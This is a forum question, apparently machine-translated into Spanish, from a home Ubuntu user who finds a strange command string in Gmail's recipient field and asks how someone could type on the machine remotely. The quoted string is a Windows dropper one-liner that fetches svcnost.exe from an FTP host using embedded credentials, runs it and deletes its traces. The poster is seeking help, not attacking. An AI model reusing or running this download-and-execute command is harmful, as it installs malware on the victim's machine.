La PC de mi casa generalmente está encendida, pero el monitor está apagado. Esta tarde llegué a casa del trabajo y encontré lo que parece un intento de pirateo: en mi navegador, mi Gmail estaba abierto (ese era yo), pero estaba en modo de composición con lo siguiente en el TO
campo:
md / c echo open cCTeamFtp.yi.org 21 >> usuario de ik & echo ccteam10 765824 >> ik & echo binary >> ik & echo get svcnost.exe >> ik & echo bye >> ik & ftp -n -v -s: ik & del ik & svcnost.exe & exit echo Tienes propiedad
Esto me parece un código de línea de comando de Windows, y el md
inicio del código combinado con el hecho de que Gmail estaba en modo de composición, hace evidente que alguien intentó ejecutar un cmd
comando. Creo que tuve la suerte de no ejecutar Windows en esta PC, pero tengo otros que sí. Esta es la primera vez que algo así me ha sucedido. No soy un gurú de Linux, y no estaba ejecutando ningún otro programa aparte de Firefox en ese momento.
Estoy absolutamente seguro de que no escribí esto, y nadie más estaba físicamente en mi computadora. Además, recientemente cambié mi contraseña de Google (y todas mis otras contraseñas) a algo así, vMA8ogd7bv
así que no creo que alguien haya pirateado mi cuenta de Google.
¿Lo que acaba de suceder? ¿Cómo alguien presiona las teclas en mi computadora cuando no es la vieja máquina Windows de Granny la que ha estado ejecutando malware durante años, sino una nueva instalación reciente de Ubuntu?
Actualización:
Permítanme abordar algunos de los puntos y preguntas:
- Estoy en Austria, en el campo. Mi enrutador WLAN ejecuta WPA2 / PSK y una contraseña medianamente segura que no está en el diccionario; tendría que ser fuerza bruta y menos de 50 metros de aquí; No es probable que haya sido pirateado.
- Estoy usando un teclado con cable USB, por lo que nuevamente es muy poco probable que alguien pueda estar dentro del alcance para hackearlo.
- No estaba usando mi computadora en ese momento; simplemente estaba inactivo en casa mientras yo estaba en el trabajo. Es una PC nettop montada en un monitor, por lo que rara vez la apago.
- La máquina tiene solo dos meses, solo ejecuta Ubuntu y no estoy usando software extraño o visitando sitios extraños. Es principalmente Stack Exchange, Gmail y periódicos. No juegos. Ubuntu está configurado para mantenerse actualizado.
- No conozco ningún servicio VNC en ejecución; Ciertamente no he instalado ni habilitado uno. Tampoco he iniciado ningún otro servidor. ¿No estoy seguro si alguno se está ejecutando en Ubuntu por defecto?
- Conozco todas las direcciones IP en la actividad de la cuenta de Gmail. Estoy bastante seguro de que Google no era una entrada.
- Encontré un Visor de archivos de registro , pero no sé qué buscar. ¿Ayuda?
Lo que realmente quiero saber es, y lo que realmente me hace sentir inseguro, es: ¿cómo puede alguien de Internet generar pulsaciones de teclas en mi máquina? ¿Cómo puedo evitar eso sin ser tan tonto? No soy un geek de Linux, soy un padre que ha estado jugando con Windows por más de 20 años y estoy cansado de eso. Y en los más de 18 años de estar en línea, nunca he visto personalmente ningún intento de pirateo, por lo que esto es nuevo para mí.
password
:-)